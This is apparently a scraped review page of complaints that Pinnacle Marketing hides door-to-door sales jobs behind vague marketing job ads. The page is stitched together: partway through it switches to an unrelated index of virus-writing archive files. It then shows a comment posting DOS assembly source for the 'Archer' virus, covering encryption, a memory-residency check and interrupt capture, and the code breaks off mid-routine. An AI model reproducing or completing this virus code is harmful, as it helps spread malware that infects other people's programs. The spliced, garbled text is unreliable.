Skip to content
  • Login
Pinnacle Marketing

Pinnacle Marketing

Is this your business?
What is your customer experience with Pinnacle Marketing?

We are currently gathering insights to provide in-depth statistics

empty-state

Consumers are asking for reviews of this business

Add review
Jilda Tgv

Don't be fooled

I want people to be made aware of another Cydcor Office in Connecticut. Pinnacle Marketing just like Integrated Concepts, The Maine House Group, and Premier Management Group is nothing more than door to door sales positions.

Pinnacle Marketing is also in the same office suite as Integrated Concepts (which you will find plenty of complaints about here on PC). Cydcor offices always promote from "within" and Pinnacle Marketing is a promoted office from Integrated Concepts. What that means is the manager for Pinnacle Marketing used to be an employee of the owner of Integrated Concepts. They share the office suite as well as the bills that go with it.

Is the job a scam? Not directly. However, the job listing you will see on Career Builder, Monster, and Craigslist are nothing short of vague and deceptive. Pinnacle Marketing does nothing with marketing or advertising. You can apply to the job if you want, however don't be surprised if you get contacted for an interview if you post your resume on CB or Monster. Avoid this position unless you want to take a job that is 100% commission and involves ridiculously long hours. Additionally, this office can only be described as being a corporate cult. Most of the employees there have no life outside of the office and usually spend the weekends with each other.

If you decide to interview for a position in HR, marketing, management,and advertising don't be fooled. You will end up doing door to door sales and that is it. They justify the position titles because you will be "cross trained" in all "aspects" of the business. What that means is you will be brainwashed and trained to find a group of equally gullible people to do what you do and then train people under them (sounds like a pyramid scheme, right?) The second round interview is a joke. It's called the "Day-of-O" and what that means is you will be following a stranger around for an entire day going door to door trying to sell a product or service (likely Direct Energy) to both commercial and residential clients. What you're doing is soliciting and 95% of the people you come across do not want to talk to you. If you are a moral person and care about others you will easily see how uncomfortable most people are when you enter their business or knock on the front door of their residence. They simply don't want you there.

Save yourself and keep looking for a job elsewhere with real earning potential and benefits. You've been warned.

View full review
36 comments
Guest

Do not be fooled by this company. It is a door-to-door job and that is it.

Ten years ago, I resoponded to a job posting for Pinnacle Advertising. When I went to the first interview, the man who interviewed me was very vauge on the job description. He told me he would tell me more about the company on the second interview. It was very weird, but I went to the second interview.

When I arrived for the second interview, they had a bunch of "recruits" like myself in the waiting area. Everyone was really confused as to what was going on. Anyway, all the workers came out and took one "recruit" with them. We spent the entire day knocking on doors in the neighborhoods of Nashville.

Later, at dinner, the Pinnacle guy I was with described their business model which was a typical pyramid scheme. If they had told me that on the first interview, I would not have lost $100 taking the day off of work for a second interview. This is a pyramid scheme.

If you are interested in a pyramid scheme, go for it. If you are not, do not waist your time.

Guest

I interviewed as the description of doing marketing at the company sounded great! The interview was in a lack luster building office, he was 30 minutes late.

In the interview it became clear that the intention of anyone, in any position, hired at Pinnacle is to force them to go from bottom to top and run their own office within a year or two. I let the interviewer (who was probably 22 years old and hadn't fixed his hair) know that I wasn't interested in running my own business, that I wanted to do marketing/pr and grow that way, and he was clear that their intentions are very different...that he wants all of his staff to move up in the company so that they can open new offices under him.

Very much sounds like a pyramid scheme to me! I just wish their online job description was clear of the position: start in marketing, trained by a current staff member, then get trained to train other new marketing hires, then open your own office.

Guest

I'm glad i read this, of course I agreed to the interview and thought "hey entry level assistant manager sounds great" but that same day my boyfriend and I did some research and realized that it wasn't legit. Of course on the one application it said NO door to door sales NO telemarketing etc.

and then we realized on another application for the same position didn't even say that at all. Heather T I am also from South Bend, glad we didn't end up going.

I emailed Lindsey last night and told her there wasn't enough information on what I would actually be doing. So glad I read this =)

Guest

I am glad I googled this first because when I did, I found that there are several sites for "Pinnacle Marketing", and when I used the domain on the end of the email address of the "HR" rep who sent me a "confirmation" email with directions before I agreed to the "interview" because it was in my inbox before we hung up after I asked her several questions she was unable to answer. It only took me about 2 sentences to realize that she was reading from a script.

A script? Really? That threw up a HUGE red flag, but I let her finish. I asked her who her "clients" are that she mentioned, along with more detail about the job and all she would tell me is something about working outside of the mall and the client is DirecTV.

I have seen someone with a little tent and some tables with brochures, trying to sell either DirectTV or Dish so if THAT is what they are, NO THANKS. After reading this, I am happy to know that my instinct was right. Nowadays, for someone with my skill set and education, I should know better if I get a call-back the next day after I applied. And to the *** who was mad at the OP for ripping on door-to-door, -THE POINT IS THAT IN THIS SITUATION, IT IS A RIPOFF, YOU DON'T GET PAID UNLESS YOU SELL AND THEY DON'T TELL YOU AHEAD OF TIME.

TO GET YOU TO "INTERVIEW" THEY LIE AND SAY THAT THERE IS SALARY, BUT ON THE WEBSITE FOR MY AREA (WHICH IS BRAND NEW, BTW) www.pinnaclemarketingsolutions.net , THEY CLEARLY STATE THAT THEY FOLLOW THE "PROMOTE FROM WITHIN" MODEL. Not to mention, if the company is real, they have ONE website for the whole company, regardless of the location, that is not the case for the company that contacted me. They have their very own new website that focuses more on their hiring, vacation and promoting than they actually do about their client services.. what does that tell you?

Their website is ONLY about hiring people, except for the very last box on the bottom, labeled "Client Services". Last time I checked, any company that's worth interviewing with actually makes it hard to get an interview and "careers" on their website is one of the smallest links on their site, down at the bottom.

Nobody has said whether or not the first "interview" was a group or individual, but I learned a LONG time ago, any "company" that has people come in as groups, needs to push to a large audience in a short amount of time, and it's all scripted in a way that answers most questions people have and sells to them at the same time. If any place has to "sell" the job to you, then there is always a catch.

Guest

Don't get down on door-to-door sales. Just cause you lack self-confidence, doesn't mean it can't work for someone else. I did Worldbook and did well.

The real losers are they who do not try.

Bye, y'all.

Guest

Please help me is NE Partners the same company as Pinnacle? I do not want to waste my time if so??

Guest

OH no way I had an interview with NE Partners today thanks, I knew something weird was up :)

Guest

THIS IS A TOTAL WASTE OF TIME ITS THE SAME COMPANY AS BEFORE THE RECEPTIONIST CALLED ME SO MANY TWICE BEFORE TO COME IN FOR AN INTERVIEW. DOOR TO DOOR SCAM NO THANKS AND STOP CALLING ME

Guest

I did this for a day and left...they lied to me to get me to come shadow someone for a day. most pathetic day of my life

Guest

I just received a call from a company at this same address, suite 19, and I believe they said it was called "NE Person Marketing" or something along those lines. I have an interview Monday...is it a waste of time or do you think this could be a different company?

I already got scammed by a company called Primerica, I am just trying to avoid another hassle before I take a day off from my temporary job. Thanks!

Guest

I worked for this company for a very brief time and everything in these posts is correct, 100%. All lies and sales tactics and a bunch of cult orientated brainwashing.

After I q2uit I was owed money and never paid. They lie and tell you it is a salary position to get you into the interview. Expect to work about 12 hour day no matter the weather. If it is raining you have to walk dood to door in the rain, even snow and in a suit if you are a male.

Company is a joke and so are the owners.

What they are in a nutshell is people who couldn't make it in the work force so they found a scheme and typically undervalued people to use and manipulate. Beware!

Guest

So I just had pretty much the same thing with a group called Trident. I was promised a position as a entry-level management, went to the first interview.

First off, I walk in and there is no real office. It was a bunch of chairs and a then around the corner a office for one guy no one else there. He tells me the second interview will be me following some guy to a store and watching him try to recruit people for DirectTv or something. I went in for the second interview and while sitting there was listening to him and some others in a conference meeting and it just seemed too shady.

I got up and left. I feel like I avoided a huge mess.

Be so careful who you respond to on careerbulider and sites like that. You don't know always what your walking into.

Guest

Wow I'm glad I read this I'm trying to change careers and don't want to wast my time with *** like these

Guest

SO back in May I had recieved an email from Premier Management Group and I decided to do some research and called the BBB and sure enough they aren't credited.. (which is illegal) And now have been contacted by Pinnacle Marketing and the same *** not and accredited business.

I have reported them. Its a scam, pyramid scheme.

Please be careful, do your research and listen to your gut... Goodluck to all

Guest

The address is 151 New Park Ave., Hartford, CT across from the Stop and Shop. The lady called me and told me to come in for an interview and that they were looking for someone who wants to eventually end up being a manager. I am so happy I found this review and I hope no one else falls for this scheme..

Guest

800-5.txt 82314

A Guide to the Selection of Anti-Virus Tools and Techniques, by W.T. Polk and L.E. Basshan, December 1992

abaittut.txt 14720

Information on the "Anti-Bait" Method of Virus Transmission

adebgtut.txt 15848

Anti-Debugger Techniques by The Master Hides Behind the Mask

agents.txt 36769

McAfee Associates Agent Listing (February 23, 1993)

allvirus.vir 22209

PC Virus Listing, by Jim Goodwin, 1989

allvirusdf.vir 30897

Slightly Updated Version of Jim Goodwin's List.

amigvir1.txt 3314

A History of the Amiga Viruses, by Paul M. of POISON Cracking Association

amigvir2.txt 6144

A History of the Amiga Viruses by Ed Earing

amigvir3.txt 1920

The Amiga IRQ Virus: It's Out! (December 28, 198

anaco001.txt 16048

ANACONDA #001: The Official VIPER Electronic Mag by Viral Inclined Programming Experts Ring

apply.yam 4117

APPLICATION: Youths Against McAfee

arcvnews01.txt 56065

ARCV: The Association of Really Cruel Viruses Newsletter

armag911.txt 2594

The 911 Virus, Disassembly and Commentary by Black Wolf

atari101.txt 54379

Viruses 101: Chapter 1

avcr-01.001 3088

Amateur Virus Creation Research Group Magazine: Introduction

avcr-01. 002 39187

Amateur Virus Creation Research Group Magazine: The New DS-512 Virus

avcr-01.003 3223

Amateur Virus Creation Research Group Magazine: Nuking, by Thimble

avcr-01. 004 3605

Amateur Virus Creation Research Group Magazine: The *** Virus

avcr-01.005 24313

Amateur Virus Creation Research Group Magazine: the AMI Virus

avcr-01.006 7359

Amateur Virus Creation Research Group Magazine: An Introduction to ASM

avcr-01.007 21995

Amateur Virus Creation Research Group Magazine: Research of the Air Cop Virus, by Security Threat

avcr-01.008 22344

Amateur Virus Creation Research Group Magazine: Research of the Wigger Virus, by Security Threat

avcr-01.009 2881

Amateur Virus Creation Research Group Magazine: Analysis of Connie

avcr-01.010 3392

Amateur Virus Creation Research Group Magazine: OhhLala Virus

avcr-01.011 4612

Amateur Virus Creation Research Group Magazine: Twister Virus

avcr-01.012 2892

Amateur Virus Creation Research Group Magazine: Vlamix 1.0

avirus.txt 4458

Overview of Some Amiga Viruses

backdoor.txt 6512

Information About Backdoors and MS-DOS and BIOS That Can Be Used by Viruses, by Qark of VLAD

baitdet.txt 6722

Advanced Bait Detection by CoKe of VLAD

batvirus.txt 668

Creating a Batch File Virus

bbinterv.iew 21652

Anatomy of a Virus Author: A Biography of the Black Baron by Matthew Probert

bdinterv.iew 18873

Interview with A Virus Writer named Blode by The Unforgiven

bedtime.nfo 4338

NFO: The Bedtime Virus, by Youngsters Against McAfee (November 16, 1992)

blckbook.txt 24240

The little Black Book of Computer Viruses Volume One: The Basic Technology by Mark A. Ludwig (1991)

bluenine.nfo 9706

A Technical Discussion About the Blue Nine Virus by Conzouler (November 19, 1994)

braininf.vir 4577

Information on the Brain Virus And Variants

bulgfact.txt 57241

The Bulgarian and Soviet Virus Factories by Vesselin Bontchev, Director of Laboratory of Computer Virology, Bulgarian Academy of Sciences, Sofia, Bulgaria

bulgfactdoc.vir 57241

The Bulgarian and Soviet Virus Factories

catvir.txt 10223

How to write a virus program, by the Cheshire Cat

ccinterv.iew 8675

Interview with Crom-Cruach of Trident

chaos.nfo 3677

INFO: The Viral Collector's Kit #1 by The Knights of Chaos (February 4, 1995)

cmvs-1.v1 37357

ViriiSearch: The Virus Research Newsletter Volume 1 Number 1

cmvs-2.v1 60096

ViriiSearch: The Virus Research Newsletter Volume 1 Number 2 (July 2, 1992)

cmvs-3.v1 59651

ViriiSearch: The Virus Research Newsletter Volume 1 Number 3 (August 2, 1992)

cnws2000.vir 14585

Computer Virus Research and Information Service Index

cnws2001.vir 17995

Computer Virus Research and Information Service #1

cnws2002.vir 3036

Computer Virus Research and Information Service #2

cnws2003.vir 5457

Computer Virus Research and Information Service #3

cnws2004.vir 44383

Computer Virus Research and Information Service #4

cnws2005.vir 49238

Computer Virus Research and Information Service #5

cnws2006.vir 8975

Computer Virus Research and Information Service #6

cnws2007.vir 8956

Computer Virus Research and Information Service #7

cnws2008.vir 91748

Computer Virus Research and Information Service #8

comp.vir 8320

The USENET Virus: A Cautionary Tale by Peter de Silva (April 20, 1990)

cpi-1.txt 20245

Corrupted Programming International Newsletter #1 by Doctor Dissector (June 30, 1989)

cpi-2.txt 99461

Corrupted Programming International Newsletter Issue #2

cpi1.vir 24305

CPI Newsletter Volume #1, 1989

cpi2.vir 98758

CPI Newsletter Volume #2

cpivirus.txt 23568

Corrupted Programming Internation #1: Computer Viruses, a Protagonist's Point of View by Doctor Dissector (June 27, 1989)

cpivirus2.txt 90571

Corrupted Programming International #2 by Doctor Dissector: Trojan Horses and Virii: A Protagonist's Point of View (July 27, 1989)

crcrevue.vir 55986

Comparison: Products to Detect Changes to Programs

csvir87.vir 4771

CompuServe Magazine's Virus History Timeline: 1987

csvir88.vir 103572

CompuServe Magazine's Virus History Timeline: 1988

csvir89.vir 69893

CompuServe Magazine's Virus History Timeline: 1989

cvirs.101 1****

C VIRUS 101: An Introduction to Viruses in C

cvm.txt 23552

Computer Virus Myths by Rob Rosenberger with Ross Greenberg

datut001.txt 8220

Scan Strings, How They Work, and How to Avoid Them, by Dark Angel

datut002.txt 9941

An introduction to Nonoverwriting Virii by Dark Angel

datut003.txt 14844

An introduction to Nonoverwriting Virii II: EXE Infectors, by Dark Angel

datut004.txt 18463

An Introduction to Nonoverwriting Virii III: SYS Infectors by Dark Angel

datut005.txt 6571

Code Optimization: A Beginner's Guide by Dark Angel

datut006.txt 10873

Advanced Polymorphism Primer by Dark Angel

datut007.txt 8171

SFT's and Their Usage, by Dark Angel

datut008.txt 17676

EXE Self-Disinfection by Dark Angel

datut009.txt 11690

Boot Infectors by Dark Angel

datut010.txt 5910

UMB Residency by Dark Angel

desc.sdi 444

NFO: The Smeg Virus Construction Kit

deth001.rot 4661

Megadeth's Guide to Virus Researching Part I by Megadeth of .ROTing [DeTH]

dhcivwar.txt 2206

Relationship Chart of the Civil War and Related Viruses by TridenT (1993)

dhinterv.iew 8668

Interview with Dark Helmet of Trident

diogenesdoc.vir 3217

Diogenes 2.0 Documentation and User Manual

dirstlth.txt 6061

Directory Stealth Techniques of Viruses (FCB)

drkfib01.txt 3524

Virus Writers Reply to the SCAN.EXE Program

enigma.asm 18797

DISASSEMBLY: The Enigma Virus

european.txt 19456

List of Known Viruses in the UK, by Joe Hirst of the British Computer Virus Research Centre

eval.vir 26111

Anti-Viral Product Evaluation

fester.vir 10122

Festering Hate: A Description of an Apple II Virus, by the Bowen Arrow

firefly.txt 19617

The Firefly Virus, by Nikedamus

fish.vir 9382

Thoughts on the Fish Virus

fndint21.txt 12608

Finding INT 21's Real Address Using the PSP by Satan's Little Helper

fog.txt 17483

FOG: A Polymorphic Encription Algorithm by Eclipse

fullstlt.txt 10033

A Full Stealth or Disinfection on Open by Blonde of Immortal Riot

funbot2.cvp 3190

How the Boot Sequence Operates, Relevant to Virus Infection

funbot3.cvp 3465

How the Boot Sequence Operates Relevant to Viral Infection, Part II.

fungen1.cvp 2792

Computer Operations and Viral Operations

fungen2.cvp 2721

Viral operations: How Viruses Function

fungen3.cvp 2672

How Viruses Use Operating Systems

fungen4.cvp 2629

How Viruses Hide in System Layers

fungen5.cvp 2939

How Viruses are Activated

fungen6.cvp 2679

How to Detect Changes made by a Virus

fungen7.cvp 2716

Checking Files for Viruses

fungen8.cvp 3033

Checking Files for Viruses, Part II

fungen9.cvp 2664

Checking the System Files for Viruses

fungena.cvp 2766

How Viruses Avoid Detection

funpiv1.cvp 2542

Viruses that Affect and Infect Files

funpiv2.cvp 2375

Viruses and how they Insert Themselves

funpiv3.cvp 2529

How to Add a Virus to a Program

funpiv4.cvp 2895

Viral Code "Association"

funpiv5.cvp 2872

Variations of Computer Virus Infection

g2.txt 25600

Phalcon/Skism's G^2 Version 0,70: The Second Generation of Virus Creation by Dark Angel (January 1, 1993)

gao_rpt 106252

The General Accounting Office Report on Computer Viruses, 1988

gf.txt 1966

Information and BBS List for General Failure, a H/P/A/V/C Oriented Computer Organization

glath.vir 21116

Computer Viruses: A Rational View, By Dr. Raymond Glath

gold-bug.txt 9373

Analysis of the Gold Bug Virus

goodwin.txt 137805

An Analysis of Computer Virus Structures (April 7, 1989)

greetng1.txt 3202

NFO: The Grretings Virus by Youngsters Against McAfee (January 2, 1993)

guardian.bbs 29058

The Guardian Lists: An Abbreviated Trojan Alert List Issue #1 (November 12, 1989)

guardian.vir 53823

The Guardian List, Issue #1, Sept. 25, 1989

hackmisc.9 9303

Hacked/Miscellaneous Dangerous Files, #9

hate.txt 1540

BBS AD: The Immortal Hate BBS

hatedetect.vir 5984

Program to Detect the Festering Hate or CyberAIDS Apple II Virus, by Tom Weishaasr (July, 198

hitler.a86 3****

The HITLER virus: commented in a rough 'n' ready way by the Crypt Newsletter staff for issue #11, January 1993

hormones.vir 19584

Net Hormones: Infection Control using Cooperation among Computers

hr5061.vir 2309

The text of H.R. 5061

hysteria.vir 18748

Virus Hysteria! By Richard B. Levin

ibmpaper.vir 87040

Coping with Computer Viruses and Related Problems

identify.txt 20602

Developing Virus Identification Products, by Tim Sankary, 1989

illegal.nfo 2083

NFO: Illegality, the Unstoppable Crime Machine (November 12, 1994)

implemen.mca 42307

Implementing Anti-Viral Programs, by John McAfee 1989

index.mag 1201

Index to SLAM Magazine Issue #1 (January 1997)

intro1.cvp 2475

Introduction to the Computer Virual Programs Column

ivm-95.1 14****

Immortal Virus Magazine Issue #95.1

jeru-b.asm 42115

DISASSEMBLY: The Jerusalem B Virus

jeru-dc.vir 3328

Analysis of the Jerusalem DC Virus

jtinterv.iew 17375

INTERVIEW: John Tardy of Trident in The Netherlands

jvvirus.txt 42968

Jerusalem B Virus Source Code

killhead.vir 959

Virus Source Code that Destroys the Disk Head

levine.pap 13323

Potential Virus Attack by L. P. Levine

lminterv.iew 54289

The Faces Behind the Masks by Sara Gordon (November 1994)

locprst.txt 32002

Excerpt from "The Virus Creation Labs: A Journey Into the Underground": A Preist Deploys His Satanic Minions

ltlmess.slt 4005

The Little Mess Spawning Virus Source from Crom-Cruach of Trident (1992)

lzinterv.iew 20100

INTERVIEW: Lord Zero, Virus Writer

macv.txt 24130

How to Write a Virus for the Macintosh, or How I Learned To Stop Worrying And Love The Resource Manager

malmsey.txt 4058

Information on the Malmsey Virus (October, 1992)

mayhem.txt 1384

Mayhem at Firms Plagued by Virus, by Philip Braund of The Mirror, transcribed by Phantasm (March 7th, 1992)

mbfamily.txt 6942

The Mayberry Family of Virus by HypoDermic

mbinterv.iew 13793

INTERVIEW: Metabolis of VLAD (Virus Writing Group)

mcaffvirus.txt 7075

Virus Characteristics, by McAfee Virus Scanning

mdef.inf 4864

The MDEF Macintosh Virus, by Tom Young of Cornell Information Technologies

melissa.txt 13926

The Melissa Macro Virus, a Report Prepared by Robert M. Slade

memres.txt 7779

Some Information on Memory Residence Methods for Viruses

michael.asm 6969

DISASSEMBLY: Michelangelo Virus

michangl.txt 6840

The Michaelangelo Virus Source Code

mk-chart.txt 1835

A Virus Relationship Chart of Masud Khafir's Viruses

mkinterv.iew 12153

INTERVIEW: Masud Khafir of Trident

mkvirlst.txt 17466

A List of Viruses Written by Masud Khafir of Trident

necro.a86 2****

Source code for the Necro, A.k.a. "Skull" Virus

net.hor 19511

Net Hormones: Part 1 - Infection Control assuming Cooperation among Computers

newinstl.txt 1472

Installation Instructions for Nowhere Man's Virus Creation Library v1.00

nist01.txt 5761

Columbus Day Virus: Press Release by Jan Kosko Sept. 22, 1989

nist02.txt 4238

Columbus Day Virus: A Fact Sheet

offspr82.txt 1470

DOCUMEN#TATION: Offspring v0.82 by Virogen (September 6, 1993)

p1.txt 10934

Attack of the Computer Virus, By Lee Dembart

pcblkjck.txt 4608

Features of Blackjack Virus (PC) (January 24, 1989)

peacevir.vir 2573

Computer Virus Hits Again (The Peace Virus)

ph-vir1.txt 19794

Dark Angel's Phunky Virus Writing Guide #1

pngintrv.iew 9876

INTERVIEW: Persona No Grata of Trident in The Netherlands

polyflag.txt 18411

A Humble PolyMorphic Engine Primer by Absolute Overlord

polymorf.txt 31851

Post Discovery Strategies: Hiding Your Virus After Discovery, by Sepultura

polymorph.txt 17432

Post Discovery Strategies: Hiding Your Virus After Discovery, by Sepultura

polymrph.txt 14524

Polymorphic Viruses Escape Detection but Get Our Attention

polyvir.txt 6299

Computer Virus Catalog 1.2: Dedicated Virus (31-January 1992)

popscia86.vir 4472

Popoolar Science virus - a very simple overwriting infector

portexec.txt 9293

Infection of Portable Executables by Qark and Quantum of VLAD

ps-vir1.txt 19801

Dark Angel's Phunky Virus Writing Guide (Part 1)

ps-vir2.txt 29546

Dark Angel's Phunky Virus Writing Guide (Part 2) The Replicator

ps-vir3.txt 20133

Dark Angel's Phunky Virus Writing Guide (Part 3) Non-Resident Virii, Part II

ps-vir4.txt 22970

Dark Angel's Phunky Virus Writing Guide (Part 4) Resident Virii, Part I

ps-vir5.txt 20131

Dark Angel's Phunky Virus Writing Guide (Part 5) Resident Viruses, Part II

ps_vir1.vir 19865

Phalcon Skism, Part I

ps_vir2.vir 29617

Phalcon Skism, Part II

ps_vir3.vir 20204

Phalcon Skism, Part III

ps_vir4.vir 23041

Phalcon Skism, Part IV

qkinterv.iew 15053

INTERVIEW: Qark of Virus Labs and Distribution (VLAD) by The Unforgiven

rab_mem.apl 3110

APPLICATION to Join RABID by ProTurbo of RABID (1991)

ratboy-1.txt 12067

RatBoy's Overwriting Virus Tutorial

ratboy-2.txt 15758

RatBoy's Overwriting Virus Tutorial Part II

readlist.vir 12800

An abbreviated bibliography for computer viruses

resist.txt 29417

Resist! Further Virus Strategies by Mouth of Sauron

rjinterv.iew 31156

An Interactive Interview with Virus-Writer Rajaat of Genesis

robin.hod 6655

Viruses and System Security (a story)

rstut001.txt 13765

Disinfecting an Infected File by Rock Steady of NuKE

rstut002.txt 9350

TSR COM Infections by Rock Steady of NuKE

rstut003.txt 7782

Constructing Kit on Infecting .COM by Rock Steady of NuKE

rstut004.txt 20142

Infection on Closing by Rock Steady of NuKE

rstut005.txt 13378

EXE Infections Part I: Infection Process, by Rock Steady of NuKE

rstut006.txt 7572

EXE Infectors Part II by Rock Steady of NuKE

rstut007.txt 11905

Directory Stealth by Rock Steady of NuKE

rstut008.txt 7273

Directory Stealth Method 2 by Rock Steady of NuKE

rstut009.txt 5350

Memory Stealth by Rock Steady NuKE

rstut010.txt 28965

The Dangers of Thunderbytes TBClean Emulation Techniques by Rock Steady of NuKE (August, 1993)

rumors.txt 9250

Rumors of Worms and Trojan Horses: Danger Lurking in the Public Domain, by Mike Guffey

rvlatn1.vir 48324

Revelation, a Virus E-Zine, Vol. 1 Issue 1

samson.vir 5642

Samson's PC Virus List

scitzo.nfo 1954

Virus Spotlight: The Scitzo Virus

sdwlnd02.ans 3788

ANSI BBS AD: Shadowland BBS

six_byte.pad 17377

Six Bytes for Virus Detection in the MS-DOS Envrionment, by Padgett Peterson, 3/29/1991

smallvir.txt 3568

The Smallest Virus I Could Manage (263 Bytes)

span02.vir 1735

You can't release the Worm source code, says SPAN

stealth.txt 3798

Elusive New Viruses Can Avoid Detection by Dennis Flanders

steroid.vir 2304

Discussion of a Trojan Horse program called "Steroid"

stoned-b.txt 10898

The Stoned-B Virus

stoned1.vir 3392

To Remove the Marijuana (Stoned) Virus from HD

stoned_d.law 9105

An Explanation of how the Stoned Virus operates by Mike Lawrie

stormbrg.rt1 2158

A Goodbye from Stormbringer of Phalcon/Skism From the World of Viruses

stormbrg.rt2 1554

A Goodbye from Stormbringer of Phalcon/Skism From the World of Viruses (Part II) (1995)

tag.ans 14090

ANSI BBS AD: The Adventures of Guild

talons01.txt 5850

Some Background on PuKE: An Introduction from TLN

talons02.txt 28869

The True Story about Talon by Talon of NUKE (April, 1994)

talons03.txt 2293

An Incredibly Complicated Tale of Mystery and Intrigue

talontut.txt 7844

Information About Mulipartite Infection of Viruses

tdoc1.txt 14961

Documentation for a Virtual Mouse Drive That's a Virus, by Seth Comstock (August 1993)

tdoc2.txt 5179

Documentation for a Story Program That's Actually a Virus, (1993)

troj.hac 4652

Lots of warnings about EGABTR.EXE

troj.txt 7528

Other warnings for other random virus programs

trojan.vir 9191

How someone's BBS got whacked with Viruses in 1984

tsrtut.txt 4484

A Documentation on Creating TSR Viruses

tuinterv.iew 6820

Intervue with TU About Virus Creation

universa.mol 13613

A universal Detection Model by Chris Ruhl and James Molini

usavirus.vir 2175

Supposed use of a computer virus during Desert Storm

v101pt1 14746

Virus 101 - Chapter 1 by George Woodside (March 1, 1989)

v101pt2 18596

Virus 101 - Chapter 2 by George Woodside (March 6, 1989)

v101pt3 19444

Virus 101 - Chapter 3, by George Woodside (March 13, 1989)

v101pt4 5845

Virus 101 - Chapter 4 by Gordon Meyer (March 30, 1989)

varicell.txt 5474

The Varicella Virus Source Codes, by Rock Steady

vdetect.vir 13696

A Universal Virus Detection Model by Chris Ruhl and James Molini

verify_r.txt 24830

Virus Verification and Removal -- Tools and Techniques by David M. Chess, Nov. 18, 1991

vguide.txt 21135

Computer Viruses: A Rational View by Raymond M. Glath

vi900906.txt 187667

Fidonet Message Base Disucssing Viruses (Summer 1990)

vi901029.txt 181138

Fidonet Message Base Disucssing Viruses (Summer 1990)

vir-1.v1 37205

ViriiSearch: The Virus Research Newsletter Volume 1 Issue 1

vir-2.v1 60027

ViriiSearch: The Virus Research Newsletter Volume 1 Issue 2 (July 2, 1992)

vir-3.v1 59654

ViriiSearch: The Virus Research Newsletter Volume 1 Issue 3 (August 2, 1992)

vir.txt 19800

Dark Angel's Phunky Virus Writing Guide

vir2.txt 29557

Dark Angel's Phunky Virus Writing Guide Installment II

virbillfax.vir 4169

NCSA Testimony on Virus Bills, 1990

virethic.txt 13124

Establishing Ethics in the Computer Virus Arena by Paul W. Ferguson, Jr. (September 1992)

virii.txt 17712

What You Should Know About Computer Viruses by BlenderHead

viris03.txt 7208

Some of the Less Known Viruses (Humor)

virpgm01.txt 12883

Virus Programming Basics Issue #1

virpgm02.txt 23762

Virus Programming Basics Issue #2: Not So Basic

virs.vir 11931

Discussions about the Jerusalem B Virus

virukpc.txt 13056

Known PC Viruses in the UK and their effects, by Dr. Alan Solomon, 1989

virus 5314

Virus Attack! By Rick Arnold

virus-al.ert 2065

Local Area Virus Update, Bay Area - Sacramento, 21 Sep, 1989

virus.1 1821

Virus Discussion on a BBS

virus.kie 32573

The Infection of PC Compatible Computers by Stephen E. Kiel and Raymond K. Lee of the Georgia Institute of Technology

virus.txt 5160

Comparison between Mcaffe's SCAN.EXE (3-25-92) and F-PROT.EXE (4-5-92) by The Researcher and Scan Man

virus1.dna 17710

What You Should Know about Computer Viruses by Blinderhead

virus1.vir 4223

Report on the DATACRIME Virus

virus101.vir 58631

Viruses 101: A Information Set

virus101001.vir 13796

Virus 101 Chapter 1

virus101002.vir 17548

Virus 101 Chapter 2

virus101003.vir 18347

Virus 101 Chapter 3

virus101004.vir 4971

Virus 101 Chapter 4

virus2.txt 11729

The Virus Informer: Your Weekly Virus Newsletter by Mark E. Bishop

virus3.txt 7585

The Virus Informer by Mark E. Bishop: The Macintosh Virus

virus4.txt 4268

The Virus Informer Chapter 4: The Engine That Kills

virus5.txt 49830

The Virus Informer Chapter 5: The Virus List

virus6.txt 1729

The Virus Informer Chapter 7: The Virus Informer Fax Bulletin Service

virus7.txt 1762

The Virus Informer by Mark E. Bishop Chapter 7: Next Week

virus_my.ths 27085

Computer Virus Myths, by Rob Rosenberger (1988-****)

virus_st.whm 16646

A New Stategy for Computer Viruses by William H. Murray

virusbas.vir 1338

An example of a Virus in BASIC

virusbib.txt 4480

Bibliography for Computer Viruses, by Ted Landberg, 02/24/1988

virusbro.vir 9856

Computer Viruses and Trojan Horses; A Guide to Protecting Yourself

virusdet.txt 50981

Virus Detection Alternatives, by Patrick Min

virusdoc.vir 205175

The Computer Virus Epidemic, 1987-****. Article Compilation

viruses.pro 10368

How to write a Virus Program, by The Cheshire Cat

viruses.txt 3123

Safe Telecommunicating may be your Best Protection against Viruses, by Micharl Fischer, A+ Magazine, August 1988

viruses.uss 20740

Viruses in the USSR by Eldar A. Musaev

virusfaq.txt 84745

FAQ: VIUS-L/comp.virus Frequently Asked Questions (November 18, 1992)

virusinf.vir 9216

A Suggested Readings List for Computer Viruses by Jon Mack

virusl.vir 1887

The Virus Informer, Issue #6

virusone.vir 4323

The Virus Informer, Issue #1

virussum.doc 558766

Virus Information Summary List, March 17, 1991, by Patricia M. Hoffman

virussum.txt 607049

The Virus Information Summary List, April 20, 1991 by Patricia M. Hoffman

virusx.txt 14142

Information on VirusX by Steve Tibbet, as well as a list of Amiga Viruses

vlab102.vir 19999

Viral Lab 102, May 1994

wininf01.txt 25224

Windows Executable Infection by Qark and Quantum of VLAD

wininf02.txt 13444

Calling the Windows API in Assembly Language by Qark of VLAD

wordmacro.txt 86611

FAQ: The MS Word 6.x Macro Viruses FAQ v2.0

xyz.txt 3424

Information on the XYZ (Examine Your Zipper) Virus (January, 1994)

yam-ivp.nfo 3769

NFO: The Instant Virus Production Kit by Youngsters Against McAfee (June 12, 1992)

yetiser_ 15345

Polymorphic Viruses: Implementation, Detection, and Protection by VDS Advanced Research Group/Tarkan Yetiser 1993

Report

13. Written by >>>>>>>>>>>VIRUS, on 01-12-2010 08:56

; archer.asm : [Archer] MnemoniX `94

; Created with Biological Warfare - Version 0.90á by MnemoniX

PING equ 0AE3Bh

PONG equ 0CD28h

STAMP equ 30

MARKER equ 04D4Dh

code segment

org 0

assume cs:code,ds:code

start:

db 0E9h,3,0 ; to virus

host:

db 0CDh,20h,0 ; host program

virus_begin:

db 0BBh ; decryption module

code_offset dw offset virus_code

mov dx,VIRUS_SIZE / 2 + 1

decrypt:

db 02Eh,081h,07h ; ADD CS:[BX]

cipher dw 0

inc bx

inc bx

dec dx

jnz decrypt

virus_code:

call $ + 3 ; BP is instruction ptr.

pop bp

sub bp,offset $ - 1

push ds es

mov ax,PING ; test for residency

int 21h

cmp bx,PONG

je installed

mov ax,es ; Get PSP

dec ax

mov ds,ax ; Get MCB

sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64

sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64

mov es,word ptr ds:[12h]

push cs ; copy virus into memory

pop ds

xor di,di

mov si,bp

mov cx,(virus_end - start) / 2 + 1

rep movsw

xor ax,ax ; capture interrupts

mov ds,ax

